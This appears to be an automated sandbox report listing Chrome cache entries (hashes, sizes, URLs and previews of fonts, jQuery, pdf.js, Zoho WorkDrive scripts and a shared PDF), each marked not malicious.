SHA-256:	FAB270511B8978075514A01AB5DFFF5AE2C0F14BD770D00A0F6717A9C1BF8F11
SHA-512:	3B74A3FD25F03089BFDEB6F0E37C900A5ED745B61A2A5BE57948BB96766DD186E5132B4E1F510197E47544DACCD3C44046980F8F15B653C9C5F58A2DFEA95E3E
Malicious:	false
Reputation:	low
URL:	https://static.zohocdn.com/webfonts/robotoregular/font.woff2
Preview:	wOF2..................w..#.....................?FFTM..~...L..L.`....T..<.....$..s.6.$..8..... ..q..f..I[ ........wv..5%...t..c..T.9V...`.U...m{P.v...........U.$............vu...@.4...L..D.E.h..egP..{......#...Xx....!.$.....#...4..8.I,.W.N.6.M:.o.\%5..z....a.....R&.k..]...O.N~.'.w...>.{.2....h.....n....Hp:...u..<.#..O0u...ct.^..T..v.<.{).o.C+....=.l.....u..H...ps.......p.FG.4gbEb.Yl.K...Hc[...ub}swQ.w.bI..P....$j.J...? I.u.v.S.bS........?xd.....".a..O....%O.~`..6..N..].G6.....q..j..j.....r...x.\|..B.iU%i.I..9.....=.q..8...........(...P..F...`N.m:.Z).D.....#..E..F2@s.n..R!-F.....,P.....1.5lcT..Fm0.%..PL.A(s...^.p.e..`.Rc$....Z.....A......@...h....j\|...`.......z.D.~....z._.....IQ.Rt.(]....>.R..%.B...H......s.w.Y>88B5.@-.<"A....?b....h.\..........D....s\...+....9.."&r.....\`.s.C....o~~.D.3]...>q.6..12...6$R...)C...0..0.C..S..U..UW.nf~L..c.h.4<.k..j#.N....C...f........J...56`...%....5..FD.@@6..A.P....UD.....;.dW.6...%....(.;.nU]ga..,.`.H

Chrome Cache Entry: 142

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	troff or preprocessor input, ASCII text, with very long lines (372)
Category:	downloaded
Size (bytes):	37414
Entropy (8bit):	4.82325822639402
Encrypted:	false
SSDEEP:
MD5:	C495654869785BC3DF60216616814AD1
SHA1:	0140952C64E3F2B74EF64E050F2FE86EAB6624C8
SHA-256:	36E0A7E08BEE65774168528938072C536437669C1B7458AC77976EC788E4439C
SHA-512:	E40F27C1D30E5AB4B3DB47C3B2373381489D50147C9623D853E5B299364FD65998F46E8E73B1E566FD79E97AA7B20354CD3C8C79F15372C147FED9C913FFB106
Malicious:	false
Reputation:	low
URL:	https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.css
Preview:	/!. Font Awesome 4.7.0 by @davegandy - http://fontawesome.io - @fontawesome. * License - http://fontawesome.io/license (Font: SIL OFL 1.1, CSS: MIT License). /./ FONT PATH. * -------------------------- /.@font-face {. font-family: 'FontAwesome';. src: url('../fonts/fontawesome-webfont.eot?v=4.7.0');. src: url('../fonts/fontawesome-webfont.eot?#iefix&v=4.7.0') format('embedded-opentype'), url('../fonts/fontawesome-webfont.woff2?v=4.7.0') format('woff2'), url('../fonts/fontawesome-webfont.woff?v=4.7.0') format('woff'), url('../fonts/fontawesome-webfont.ttf?v=4.7.0') format('truetype'), url('../fonts/fontawesome-webfont.svg?v=4.7.0#fontawesomeregular') format('svg');. font-weight: normal;. font-style: normal;.}..fa {. display: inline-block;. font: normal normal normal 14px/1 FontAwesome;. font-size: inherit;. text-rendering: auto;. -webkit-font-smoothing: antialiased;. -moz-osx-font-smoothing: grayscale;.}./ makes the font 33% larger relative to the icon container */..

Chrome Cache Entry: 143

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JSON data
Category:	downloaded
Size (bytes):	3336
Entropy (8bit):	4.800948259144333
Encrypted:	false
SSDEEP:
MD5:	9ACAF1719255E9DD5B5060271DFF9196
SHA1:	524472135E54DD650FB9B5AB65C7047805DE4AE7
SHA-256:	1815C15E36EA6ADB1F83DB6E80A637BA3D536BA90D166BEF3104D162904D9067
SHA-512:	EC9683CFF491C88A339966F46348ED7C68DB61870170235EDFD6CC5153C19792B0CB331941CB16CCBD708D186C98C0669EEC777F6E1468A95B78E6C5230310D4
Malicious:	false
Reputation:	low
URL:	https://static.zohocdn.com/personal/stable/jsapps/enterprise/dist/assets/assetMap.json
Preview:	{. "assets": {. "assets/assetMap.json": "assets/assetMap.json",. "assets/enterprise.js": "assets/enterprise-f41e469a538bf9b37a684a716d7c4694.js",. "assets/vendor.js": "assets/vendor-900c096986ead3806ccc2775fc9a83a9.js",. "engines-dist/custom-field/assets/engine.js": "engines-dist/custom-field/assets/engine-a4ed59a605cf329da3b9bb36b43fb49a.js",. "engines-dist/team-info/assets/engine.js": "engines-dist/team-info/assets/engine-ac3a873afeaa5b70a1f15ebdfe7dc6b7.js",. "engines-dist/wd-application/assets/engine.js": "engines-dist/wd-application/assets/engine-646216d6bb69b46c9db90f9428cee182.js",. "engines-dist/wd-docs-menu/assets/engine.js": "engines-dist/wd-docs-menu/assets/engine-4f3346e246f2c91fb467e1bc5bbe8989.js",. "engines-dist/wd-search/assets/engine.js": "engines-dist/wd-search/assets/engine-84b890380ac4c40dc4b2cf16f43c476d.js",. "engines-dist/wd-shared-items/assets/engine.js": "engines-dist/wd-shared-items/assets/engine-8d68f5069949fb9147603715c2b073a7.js"

Chrome Cache Entry: 144

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (65374)
Category:	downloaded
Size (bytes):	2642701
Entropy (8bit):	4.7762505539130995
Encrypted:	false
SSDEEP:
MD5:	5FF7B4508CDCB823C5206700CC16F3F6
SHA1:	676856EED35CF6C4F1B86C2B49BE1B5017FE259E
SHA-256:	32CED524EE2F50162442809E99E46F9D915960BA9F0E9FB4935E2019D8DB7EF4
SHA-512:	87BE33A4B8D8D0A92CD9C6F79F2F58235700D3AA250C53BF753AB12ED863BB082F9A3670DD099B67D47358849A9547E16A26E070275F68620488DB79D0F4AD48
Malicious:	false
Reputation:	low
URL:	https://static.zohocdn.com/personal/stable/jsapps/ui-lab/dist/assets/dev/default_theme-5ff7b4508cdcb823c5206700cc16f3f6.css
Preview:	/!. # Semantic UI 2.4.1 - Site. * http://github.com/semantic-org/semantic-ui/. . . * Released under the MIT license. * http://opensource.org/licenses/MIT. . /body,html{font-size:13px}.ui.header,.zwd-ui.zwd-header,h1,h2,h3,h4,h5{margin:calc(2rem - .14285714em) 0 1em;font-family:inherit}a,a:hover{text-decoration:none}body,html,p{line-height:1.53846154em}.searchui-filter>.ui.selection.dropdown .menu:not(.scrolling),.searchui-filter>.ui.selection.dropdown .zwd-menu:not(.zwd-scrolling),.zwd-searchui-filter>.zwd-ui.zwd-selection.zwd-dropdown .menu:not(.scrolling),.zwd-searchui-filter>.zwd-ui.zwd-selection.zwd-dropdown .zwd-menu:not(.zwd-scrolling),body,html{overflow-y:hidden}.zwd-lato,.zwd-ptsans{font-feature-settings:'liga' 0,'clig' 0}.pl--1,.pl--2,.pl--3,.pl--4,.pl--5,.pl--6,.pl--7,.pr--1,.pr--2,.pr--3,.pr--4,.pr--5,.pr--6,.pt--1,.pt--11,.pt--2,.pt--3,.pt--4,.pt--5,.pt--6,.pt--8,.pt-1,.pt-2,.pt-3,.pt-4,.pt-5,.pt-6,.pt-7,.zwd-pl--1,.zwd-pl--2,.zwd-pl--3,.zwd-pl--4,.zwd-pl--5,.zwd-pl-

Chrome Cache Entry: 145

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PDF document, version 1.5, 1 pages
Category:	downloaded
Size (bytes):	107152
Entropy (8bit):	7.9677131860296315
Encrypted:	false
SSDEEP:
MD5:	58551C01EDE130583618072F893DDF92
SHA1:	4FBA964676D275357CFD7C46F8E7BF563B977CC0
SHA-256:	8FB7074ABE4E7F7E33A34BDE6BA38B7C08E509AAAE8022F9A9BED67CA984234C
SHA-512:	828C29DFF501BEDA959B77C7D73AFCFE00031C155E9C52A32C3BA3C569E1DF3E3041A26D58A81A4B22CFD9DBE59C69C3039F7AEA49066BA90A37FF4EBFCFF72F
Malicious:	false
Reputation:	low
URL:	https://previewengine-accl.zohoexternal.com/pdf/WD/s8yrwa67a53974b474ef79eb70d1033b872c5:2f5b94ba3e3fc5:0
Preview:	%PDF-1.5.%.....42 0 obj.<< /Linearized 1 /L 107152 /H [ 803 156 ] /O 46 /E 105417 /N 1 /T 106632 >>.endobj. .43 0 obj.<< /Type /XRef /Length 79 /Filter /FlateDecode /DecodeParms << /Columns 5 /Predictor 12 >> /W [ 1 3 1 ] /Index [ 42 22 ] /Info 2 0 R /Root 44 0 R /Size 64 /Prev 106633 /ID [<b40564f5d6a2ac4a94bc93613a31e393><502998158572d93e4feb9182bbbfcc61>] >>.stream.x.cbd`.g`b``8.".n.H.b....H9.d.....&..e-...`.....&...[... 2.-...L:.e%.$..:..f....endstream.endobj. .44 0 obj.<< /Lang (en-US) /MarkInfo << /Marked true >> /Pages 1 0 R /StructTreeRoot 5 0 R /Type /Catalog >>.endobj.45 0 obj.<< /Filter /FlateDecode /S 36 /Length 78 >>.stream.x.c``.b``Vf```.....06+..0 ...30H0.2.o.w@X...#.S..........2Os.X.XV...do.....b...endstream.endobj.46 0 obj.<< /Annots [ 63 0 R ] /Contents

Chrome Cache Entry: 146

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (1792)
Category:	downloaded
Size (bytes):	522141
Entropy (8bit):	5.353161255389181
Encrypted:	false
SSDEEP:
MD5:	0459C771ABCCCC69C0A4D76D4A366A8B
SHA1:	724B68C496C876046131F844D645DB967A5F7C4B
SHA-256:	1DFE13903DCEB1C0AE15F479563E8E69C6E7F34690914F51687C45CAA43772A2
SHA-512:	B868028534FF9A5287EDF23063D3FBE4C4A34623284959881A163ADBBA12A7B46C4023AC62E5C50F393C2058FF10B3D814EC0FCD9BA6ABFFC1795362477116E3
Malicious:	false
Reputation:	low
URL:	https://static.zohocdn.com/personal/stable/jsapps/files/dist/engines-dist/zd-file-preview/assets/engine-54ba078784b28baf766d46e1a2d97128.js
Preview:	define("zd-file-preview/components/additional-info",["exports","docs-addon/components/additional-info"],(function(e,t){"use strict".Object.defineProperty(e,"__esModule",{value:!0}),e.default=void 0.var i=t.default.extend({}).e.default=i})),define("zd-file-preview/components/annotation-comment-helper-text-banner",["exports","zd-file-preview/templates/components/annotation-comment-helper-text-banner"],(function(e,t){"use strict".Object.defineProperty(e,"__esModule",{value:!0}),e.default=void 0.var i=Ember.Component.extend({layout:t.default,tagName:"",isLeftPanelActive:"",closeBannerHelperLabel:"",commentHelperMessage:""}).e.default=i})),define("zd-file-preview/components/audio-controls",["exports","zd-file-preview/templates/components/audio-controls"],(function(e,t){"use strict".Object.defineProperty(e,"__esModule",{value:!0}),e.default=void 0.var i=Ember.Component.extend({layout:t.default,tagName:"",volumeIcon:"up",seekObj:Ember.Object.create({deviceClass:"notouch"}),init(){this._super(

Chrome Cache Entry: 147

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (65451)
Category:	downloaded
Size (bytes):	89476
Entropy (8bit):	5.2896589255084425
Encrypted:	false
SSDEEP:
MD5:	DC5E7F18C8D36AC1D3D4753A87C98D0A
SHA1:	C8E1C8B386DC5B7A9184C763C88D19A346EB3342
SHA-256:	F7F6A5894F1D19DDAD6FA392B2ECE2C5E578CBF7DA4EA805B6885EB6985B6E3D
SHA-512:	6CB4F4426F559C06190DF97229C05A436820D21498350AC9F118A5625758435171418A022ED523BAE46E668F9F8EA871FEAB6AFF58AD2740B67A30F196D65516
Malicious:	false
Reputation:	low
URL:	https://static.zohocdn.com/personal/stable/jsapps/ui-lab/dist/assets/dev/jquery/jquery.min-dc5e7f18c8d36ac1d3d4753a87c98d0a.js
Preview:	/! jQuery v3.5.1 \| (c) JS Foundation and other contributors \| jquery.org/license /.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n\|\|E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]\|\|t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}function w(e){return null==e?e+"":"o

Chrome Cache Entry: 148

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Unicode text, UTF-8 text, with very long lines (1394)
Category:	downloaded
Size (bytes):	2689434
Entropy (8bit):	5.398769156188236
Encrypted:	false
SSDEEP:
MD5:	09A4C5BC25003664F725DC126CD8593B
SHA1:	A85F4CAF0823594C01E075C85435D61BC101099E
SHA-256:	41923BBB9624F1F2A4C47F448A40D8B05C8771A7CBDD480EFA15DCDF3C7C0CEC
SHA-512:	DB53B6DE9F5D1B5A32569380CA87B50EF8632E9AEADBB6EA902F39BDFAC339D7F45DD1B8EE407297E3478820D95534FA1946B4EE4D06160A7B01F989510CFE32
Malicious:	false
Reputation:	low
URL:	https://static.zohocdn.com/personal/stable/jsapps/files/dist/assets/vendor-22407dc3feacb8f79651a5810cc8cefd.js
Preview:	window.EmberENV=function(e,t){for(var r in t)e[r]=t[r].return e}(window.EmberENV\|\|{},{FEATURES:{},EXTEND_PROTOTYPES:!1,_APPLICATION_TEMPLATE_WRAPPER:!1,_DEFAULT_ASYNC_OBSERVERS:!0,_JQUERY_INTEGRATION:!0,_TEMPLATE_ONLY_GLIMMER_COMPONENTS:!0}).var loader,define,requireModule,require,requirejs,runningTests=!1;(function(e){"use strict".function t(){var e=Object.create(null).return e.__=void 0,delete e.__,e}var r={loader:loader,define:define,requireModule:requireModule,require:require,requirejs:requirejs}.requirejs=require=requireModule=function(e){for(var t=[],r=d(e,"(require)",t),i=t.length-1;i>=0;i--)t[i].exports().return r.module.exports},loader={noConflict:function(t){var i,n.for(i in t)t.hasOwnProperty(i)&&r.hasOwnProperty(i)&&(n=t[i],e[n]=e[i],e[i]=r[i])},makeDefaultExport:!0}.var i=t(),n=(t(),0).var a=["require","exports","module"].function s(e,t,r,i){this.uuid=n++,this.id=e,this.deps=!t.length&&r.length?a:t,this.module={exports:{}},this.callback=r,this.hasExportsAsDep=!1,this.isAli

Chrome Cache Entry: 150

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (560), with no line terminators
Category:	downloaded
Size (bytes):	560
Entropy (8bit):	4.747460735131854
Encrypted:	false
SSDEEP:
MD5:	50EFEAD32C5312E506AE0E5D55D02F56
SHA1:	2112EB6DD7E32662B527AE2DC7EBFD49875AD1D2
SHA-256:	14659C19A546D78BC190D091E8CF5056CC9F9B1E6E063D5C9A07C73DE18C29A2
SHA-512:	13E221389C085313E3360DC3FDFF57866F7526B45CB50F32CA5D5355D162622E193482BF2CC6A14C261633B2B9CEB76B06E342F845115ED667553D0DC4473B66
Malicious:	false
Reputation:	low
URL:	https://static.zohocdn.com/personal/stable/jsapps/ui-lab/dist/assets/dev/worker/xhr_worker.min.js
Preview:	onmessage=function(s){var e=s.data.requestType?s.data.requestType:"GET",a=void 0===s.data.isAsync\|\|s.data.isAsync,t=s.data.responseType?s.data.responseType:"json",o=new XMLHttpRequest;o.open(e,s.data.requestURL,a),o.onreadystatechange=function(){if(4===this.readyState&&200===this.status)if(s.data.customData){var e={};e.response=this.response,e.customData=s.data.customData,postMessage(e)}else postMessage(this.response)},o.onerror=function(){postMessage(this.status)},o.responseType=t,s.data.isCrossDomain&&(o.withCredentials=s.data.isCrossDomain),o.send()};

Chrome Cache Entry: 151

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Unicode text, UTF-8 text, with very long lines (64730)
Category:	downloaded
Size (bytes):	361616
Entropy (8bit):	5.333522558144686
Encrypted:	false
SSDEEP:
MD5:	3332EFC21F3075B287573043E9442F2D
SHA1:	6757E69F89AA2075E0782A1F5DE8E647FBDAE3E7
SHA-256:	FB088F0CCAD47E7118C5F3BD563A527B8C77CC7AAD8BE27B988079ED2B90DA19
SHA-512:	E6C48D36402328AE15C2CE3ADD66AC277FC97CC4F858376406A2D4192E68CC9E1D481FCF0495BC4B22E21FD5A5462A405DE48B96779722C03898265BF8BD73E0
Malicious:	false
Reputation:	low
URL:	https://static.zohocdn.com/personal/stable/jsapps/ui-lab/dist/assets/dev/pdfjs_legacy/legacy/build/pdf.min-3332efc21f3075b287573043e9442f2d.js
Preview:	/*. @licstart The following is the entire license notice for the. * JavaScript code in this page. . Copyright 2022 Mozilla Foundation. . Licensed under the Apache License, Version 2.0 (the "License");. * you may not use this file except in compliance with the License.. * You may obtain a copy of the License at. . http://www.apache.org/licenses/LICENSE-2.0. . Unless required by applicable law or agreed to in writing, software. * distributed under the License is distributed on an "AS IS" BASIS,. * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.. * See the License for the specific language governing permissions and. * limitations under the License.. . @licend The above is the entire license notice for the. * JavaScript code in this page. */.!function webpackUniversalModuleDefinition(t,e){"object"==typeof exports&&"object"==typeof module?module.exports=e():"function"==typeof define&&define.amd?define("pdfjs-dist/build/pdf",[],e):"object"==type

Chrome Cache Entry: 152

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (65536), with no line terminators
Category:	downloaded
Size (bytes):	463654
Entropy (8bit):	4.769620381397798
Encrypted:	false
SSDEEP:
MD5:	99001908B3DFAFF98AF735CECEE7D34C
SHA1:	DAEBF3085845940F90F9A7780F706AE976E3D022
SHA-256:	BC2D058998215CA71D59C113506943F01A64FE4F5AD3B39B42C90916143BC43A
SHA-512:	26FB596BEC77B08845BA5AF755390C90547D14C59647A6BD5D2E2493F774855FABD1F7CE0C555F4DF0D9271D4CDFD912F38DFA9C5493F49CF4CE2B4C43A302C2
Malicious:	false
Reputation:	low
URL:	https://static.zohocdn.com/personal/stable/jsapps/ui-lab/dist/assets/dev/intl/js/team/team-99001908b3dfaff98af735cecee7d34c.js
Preview:	wdI18NObj={'label_common_workspace':'Team Folder','label_common_workspaces':'Team Folders','label_common_family_folder':'Family Folder','label_common_family_folders':'Family Folders','label_common_family_space':'Family Space','label_common_family_spaces':'Family Spaces','label_common_teamspace':'Team Space','label_common_teamspaces':'Team Spaces','label_common_lowercase_team':'team','label_common_uppercase_team':'Team','label_common_lowercase_teams':'teams','label_common_uppercase_teams':'Teams','label_common_lowercase_family':'family','label_common_uppercase_family':'Family','label_common_lowercase_families':'families','label_common_uppercase_families':'Families','label_common_by':'by','label_common_system_generated':'System (auto-generated)','label_common_personal':'Personal','label_common_sharedwithme':'Shared with Me','label_common_created_by':'Created by','label_common_created_on':'Created on','label_common_modified_by':'Modified by','label_common_shared_by':'Shared by','label_com

Chrome Cache Entry: 153

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Web Open Font Format (Version 2), TrueType, length 67468, version 2.8978
Category:	downloaded
Size (bytes):	67468
Entropy (8bit):	7.996395549140606
Encrypted:	true
SSDEEP:
MD5:	42619423F97DB1B7DF843127F0D12534
SHA1:	8B3D8F01DA182B06F7B176848DC27059C442EB9F
SHA-256:	2C7B8A31A614AA1D0BB6F64B784A14DE742F95BAB2D4805E87E3E64D0EE1778E
SHA-512:	7362C6CD5FE7086C8E184E947BE7A783AA0CC377565DCA40A61FEC208B828B53EA8003F8139905A9DA6A810F139F1B732505E411B3713B5B40CE327DD77EFB45
Malicious:	false
Reputation:	low
URL:	https://static.zohocdn.com/webfonts/robotobold/font.woff2
Preview:	wOF2...............\...$..#.....................?FFTM..~...$..L.`....H..<........E.6.$..8..... ..}..f..)[....5....&.\.M....3..c.`.....j...Nf.B.`..7.=....,.0......e....]....EE..."1.$Y.`";L...:Nb.... %.b.yVl..on...2c. L...2.B..8BD...zRrN..`....<..\9..<...uv-...I...U.....3/...HyH..T3...b...0)\y.e/.......cw.O...F..t4. .jt;5.).....&...T..X.)g.....>..>v.v.j....T....-..`..... .o>!....P.n..#......$....6;.....a)...:U.N..'...4}...u).X<..8.b.7}Ti..R...2s..}.N}.aUW.Cu.k.P.B.....Q.gl.lx).&~..K."%.E\|..C...f0%..]...3...[..M.g.Bw../....m...dM.4....Dz.......}..4..pY..V k....n.....0.T.I.Z...t{..W,...b../.....y."..;....bG9...q...z..cx...v.....^\.?.....?DF....48..h..l.$.8..'R.T....Q...-.)J.......BT....~n..a$.RCR....`.,.U....m..Tf.}e.?E....?..?,...a...$..F.....T.{7.aUl...R^.A.h......`.@i.t.....d.......;'...._....).h.`.^S.b........nH.N....$......=.br:.I?..?.Hx".H...R......#..: \......._{v.... v.P........=......]..@..1E=Gi..^..98....~.M.... XHWS..m.#...cL..

Chrome Cache Entry: 154

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JSON data
Category:	downloaded
Size (bytes):	11494
Entropy (8bit):	5.132103790355017
Encrypted:	false
SSDEEP:
MD5:	07B56438562E5B5D07867F64E3231975
SHA1:	7C76D27AC2CD40E79F59550856FABC62278FCB71
SHA-256:	76FC02468D08DC9B4892681ABE0722F552FCE6D866DE68DE7ECB1D838D5527EC
SHA-512:	6530A877427BEB57E707C75C9C57409E99DC947D37D35D842A8995BDBF9D01489AD9E3145CB6E58AD63A89CE535E4695E1CC2F3172BB7D0CCC5770636D4C7F72
Malicious:	false
Reputation:	low
URL:	https://workdrive.zohoexternal.com/public/api/v1/files/s8yrwa67a53974b474ef79eb70d1033b872c5
Preview:	{"data":{"id":"s8yrwa67a53974b474ef79eb70d1033b872c5","type":"files","attributes":{"modified_by_zuid":"812492875","is_locked":false,"conv_engine_type":1,"is_fillable_resource":false,"is_published":false,"destination_id":"s8yrwd7ed6aed2a23484786da8a6519d1409a","storage_info":{"size":"104.94 KB","storage_used":"104.94 KB","files_count":0,"folders_count":0,"size_in_bytes":107462,"storage_used_in_bytes":107462,"storage_used_by_workdrive_in_bytes":0,"storage_used_by_app_in_bytes":0},"type":"pdf","created_time_i18":"May 31, 5:29 AM","modified_time_in_millisecond":1685536096768,"status_change_time":"May 31, 5:28 AM","download_url":"https://files-accl.zohoexternal.com/public/workdrive-external/download/s8yrwa67a53974b474ef79eb70d1033b872c5","comment_badge_count":0,"is_app_associated":false,"created_time":"May 31, 5:29 AM","lock_status":2,"is_folder":false,"resource_type":2505,"is_email_in_upload":false,"display_attr_name":"DOCUMENTS-.pdf","created_by":"kdkss","display_html_name":"DOCUMENTS-.pd

Chrome Cache Entry: 155

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with no line terminators
Category:	downloaded
Size (bytes):	16
Entropy (8bit):	3.875
Encrypted:	false
SSDEEP:
MD5:	36BEF58189120856B333E38EBF81881A
SHA1:	653D62CBFBBC491B0542F571D64F0E284BF06E15
SHA-256:	DBA5059554EADEB1B8FB2939D0FCCC199E5776F11972C7885DBB563368BC4EB6
SHA-512:	4BD116F28031B28D78E7474A9828B0FDD7B79AA9B240DE2D500D310EA27EFD8B1F15552C34CA2B8D6435776A77854C27672595DD86574D5E4F57077E7A75327A
Malicious:	false
Reputation:	low
URL:	https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTA0LjAuNTExMi4xMDISEAkyn-c4rZlLtxIFDZutwTI=?alt=proto
Preview:	CgkKBw2brcEyGgA=

Chrome Cache Entry: 156

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JSON data
Category:	downloaded
Size (bytes):	1835
Entropy (8bit):	4.84384677922512
Encrypted:	false
SSDEEP:
MD5:	B510401240F592757714128EAD495728
SHA1:	264D767310B3A129CE41BE4DCA67EEE1669EA116
SHA-256:	849B47BC654E6BD1ED340794AC56C6C01A308A85F71EEA8C85BBD21247814CBB
SHA-512:	1512C084AB7B7EFD1688C3BBDE7DDBBC7D2326A9093661C32E30CFDAB0C3F4BBDA9B8C1DAA78E0FE9CC0706977579740BABDC9B88B1689C312E151495EC23581
Malicious:	false
Reputation:	low
URL:	https://static.zohocdn.com/personal/stable/jsapps/files/dist/assets/assetMap.json
Preview:	{. "assets": {. "assets/assetMap.json": "assets/assetMap.json",. "assets/files.js": "assets/files-bc2e7ff04af0a620f96a76a22d4b3dd2.js",. "assets/vendor.js": "assets/vendor-22407dc3feacb8f79651a5810cc8cefd.js",. "engines-dist/custom-field/assets/engine.js": "engines-dist/custom-field/assets/engine-a4ed59a605cf329da3b9bb36b43fb49a.js",. "engines-dist/wd-docs-menu/assets/engine.js": "engines-dist/wd-docs-menu/assets/engine-4f3346e246f2c91fb467e1bc5bbe8989.js",. "engines-dist/wd-templates/assets/engine.js": "engines-dist/wd-templates/assets/engine-16117c3099edd41829414b5ff76cc179.js",. "engines-dist/zd-accessed-stats/assets/engine.js": "engines-dist/zd-accessed-stats/assets/engine-df7d75f2dfb963938db69806bc15ed36.js",. "engines-dist/zd-choose-folder/assets/engine.js": "engines-dist/zd-choose-folder/assets/engine-739f2481a5f461561c6ee2d28a16941b.js",. "engines-dist/zd-collect-file/assets/engine.js": "engines-dist/zd-collect-file/assets/engine-c03a0bfa6c626c4a2f04

Chrome Cache Entry: 157

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (7649)
Category:	downloaded
Size (bytes):	451716
Entropy (8bit):	5.4501036114853
Encrypted:	false
SSDEEP:
MD5:	A8F7D31118C377129271AC2F7493EEE4
SHA1:	A4AD6DE6031E2563FE9A446DE891FDB7A02C04CA
SHA-256:	C87DDF21463AE945A84D506487E0AC0EBF46BC3BB76D8E8FE76546FE1FC58595
SHA-512:	ADD43190E21DB000B68E9D53B9C4850AF68056A5411509F39A7E6F42AF8D142F5A1B00C00EDC89DC5373DE3EF91E2EC9804C5F749D311FF9778CDE9C049E8328
Malicious:	false
Reputation:	low
URL:	https://static.zohocdn.com/personal/stable/jsapps/files/dist/assets/files-bc2e7ff04af0a620f96a76a22d4b3dd2.js
Preview:	"use strict".define("files/adapters/-json-api",["exports","@ember-data/adapter/json-api"],(function(e,t){Object.defineProperty(e,"__esModule",{value:!0}),Object.defineProperty(e,"default",{enumerable:!0,get:function(){return t.default}})})),define("files/adapters/application",["exports","docs-addon/adapters/application"],(function(e,t){Object.defineProperty(e,"__esModule",{value:!0}),Object.defineProperty(e,"default",{enumerable:!0,get:function(){return t.default}})})),define("files/adapters/file",["exports","docs-addon/adapters/file"],(function(e,t){Object.defineProperty(e,"__esModule",{value:!0}),Object.defineProperty(e,"default",{enumerable:!0,get:function(){return t.default}})})),define("files/adapters/privatespace",["exports","docs-addon/adapters/privatespace"],(function(e,t){Object.defineProperty(e,"__esModule",{value:!0}),Object.defineProperty(e,"default",{enumerable:!0,get:function(){return t.default}})})),define("files/adapters/workspace",["exports","docs-addon/adapters/worksp

Chrome Cache Entry: 158

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (32030)
Category:	downloaded
Size (bytes):	86709
Entropy (8bit):	5.367391365596119
Encrypted:	false
SSDEEP:
MD5:	E071ABDA8FE61194711CFC2AB99FE104
SHA1:	F647A6D37DC4CA055CED3CF64BBC1F490070ACBA
SHA-256:	85556761A8800D14CED8FCD41A6B8B26BF012D44A318866C0D81A62092EFD9BF
SHA-512:	53A2B560B20551672FBB0E6E72632D4FD1C7E2DD2ECF7337EBAAAB179CB8BE7C87E9D803CE7765706BC7FCBCF993C34587CD1237DE5A279AEA19911D69067B65
Malicious:	false
Reputation:	low
URL:	https://code.jquery.com/jquery-3.1.1.min.js
Preview:	/! jQuery v3.1.1 \| (c) jQuery Foundation \| jquery.org/license /.!function(a,b){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){"use strict";var c=[],d=a.document,e=Object.getPrototypeOf,f=c.slice,g=c.concat,h=c.push,i=c.indexOf,j={},k=j.toString,l=j.hasOwnProperty,m=l.toString,n=m.call(Object),o={};function p(a,b){b=b\|\|d;var c=b.createElement("script");c.text=a,b.head.appendChild(c).parentNode.removeChild(c)}var q="3.1.1",r=function(a,b){return new r.fn.init(a,b)},s=/^[\s\uFEFF\xA0]+\|[\s\uFEFF\xA0]+$/g,t=/^-ms-/,u=/-([a-z])/g,v=function(a,b){return b.toUpperCase()};r.fn=r.prototype={jquery:q,constructor:r,length:0,toArray:function(){return f.call(this)},get:function(a){return null==a?f.call(this):a<0?this[a+this.length]:this[a]},pushStack:function(a){var b=r.merge(this.con

Chrome Cache Entry: 159

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 250
Category:	dropped
Size (bytes):	199
Entropy (8bit):	6.766983163126765
Encrypted:	false
SSDEEP:
MD5:	21B761F2B1FD37F587D7222023B09276
SHA1:	F7A416C8907424F9A9644753E3A93D4D63AE640E
SHA-256:	72D4161C18A46D85C5566273567F791976431EFEF49510A0E3DD76FEC92D9393
SHA-512:	77745F60804D421B34DE26F8A216CEE27C440E469FD786A642757CCEDBC4875D5196431897D80137BD3E20B01104BA76DEC7D8E75771D8A9B5F14B66F2A9B7C0
Malicious:	false
Reputation:	low
